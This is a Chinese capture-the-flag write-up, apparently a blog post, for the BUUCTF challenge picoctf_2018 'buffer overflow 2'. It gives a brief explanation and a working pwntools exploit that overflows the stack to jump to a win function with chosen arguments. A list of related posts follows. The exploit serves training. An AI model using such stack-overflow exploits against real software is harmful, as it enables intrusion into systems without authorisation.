[BUUCTF-pwn]——picoctf_2018_buffer overflow 2

简单的栈溢出,不过需要将参数自己设置而已
注意负数如何转换为补码, 不知道也可以直接在汇编里面找

from pwn import *
p = remote('node3.buuoj.cn',28931)
a1 = 0xdeadbeef
a2 = 0xdeadc0de
payload = 'a' * (0x6c + 4) + p32(0x080485CB) + p32(0)+ p32(a1) + p32(a2)
p.recvline()
p.send(payload)
p.interactive()

[BUUCTF-pwn]——picoctf_2018_buffer overflow 2相关推荐

  1. 持续更新 BUUCTF——PWN(一)

    文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...

  2. [BUUCTF-pwn]——picoctf_2018_buffer overflow 0

    [BUUCTF-pwn]--picoctf_2018_buffer overflow 0 好久不写BUU了,手都快生了赶快过来写写. 通过观察源文件发现,首先有put函数不需要去libc中找,同时ar ...

  3. [BUUCTF-pwn]——picoctf_2018_buffer overflow 1

    [BUUCTF-pwn]--picoctf_2018_buffer overflow 1 简单的栈溢出, 返回地址,设置为win就好 exploit from pwn import * p = rem ...

  4. BUUCTF Pwn warmup

    BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...

  5. BUUCTF PWN rip1 WP

    BUUCTF   PWN   rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...

  6. buuctf pwn bjdctf_2020_babyrop

    buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...

  7. 持续更新 BUUCTF——PWN(二)

    文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...

  8. 持续更新 BUUCTF——PWN(三)

    文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...

  9. Buuctf(pwn) picoctf_2018_rop chain 栈溢出

    32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为 ...

最新文章

  1. flask 获取网址
  2. 科大星云诗社动态20210815
  3. 创建与打开IPC通道的POSIX和SYSTEM V方法
  4. 几级工作台做石头高墙_创造与魔法:建筑新手入门攻略,家园建材怎么做
  5. 计算机网络在地理信息系统中应用,计算机网络在地理信息系统中有哪些应用?...
  6. 多线程的那点儿事(之windows锁)
  7. mongodb,spring data api常用总结
  8. CS224N刷题——Assignment1.3_word2vec
  9. 任务栏可以点,电脑桌面却不显示内容的解决方法
  10. 2020计算机校友会大学排名,2020年校友会大学排名:一个世界一流大学,一个中国一流大学...
  11. 交互式机器学习/ 强化学习在图像领域中的应用
  12. iOS定位原理和使用建议
  13. 百度智能音箱入局正当时,如何平台+硬件两不误?
  14. 用VB.NET设计各种形状的窗体界面(图)
  15. 微信公众号图文消息添加word附件教程详解
  16. matlab循迹小车,Arduino智能小车系列教程6——循迹小车
  17. 微信小程序 云开发表数据一键清空
  18. Android RSA加密解密,用于和服务器交互时的请求
  19. 软件工程复习笔记 顺序图(时序图)
  20. Unity官方中文文档

热门文章

  1. Android spinner取Value和Text的值
  2. [转]UTF-8 GBK UTF8 GB2312 之间的区别和关系
  3. 隐藏画质代码_和平精英120帧率怎么设置?和平精英120帧率代码介绍!
  4. 【数据结构与算法】之深入解析“压缩字符串”的求解思路与算法示例
  5. Git之深入解析本地仓库的基本操作·仓库的获取更新和提交历史的查看撤销以及标签别名的使用
  6. 2018年第九届蓝桥杯 - 省赛 - C/C++大学A组 - F.航班时间
  7. 2019\National _C_C++_C\试题 B: 递增序列
  8. AI Studio 学习 Go 豆瓣电影爬取
  9. 【C/C++9】天气APP:Oracle的虚表/日期/序列,索引/视图/链路/同义词,数据库高可用性
  10. 【ARM】异常产生指令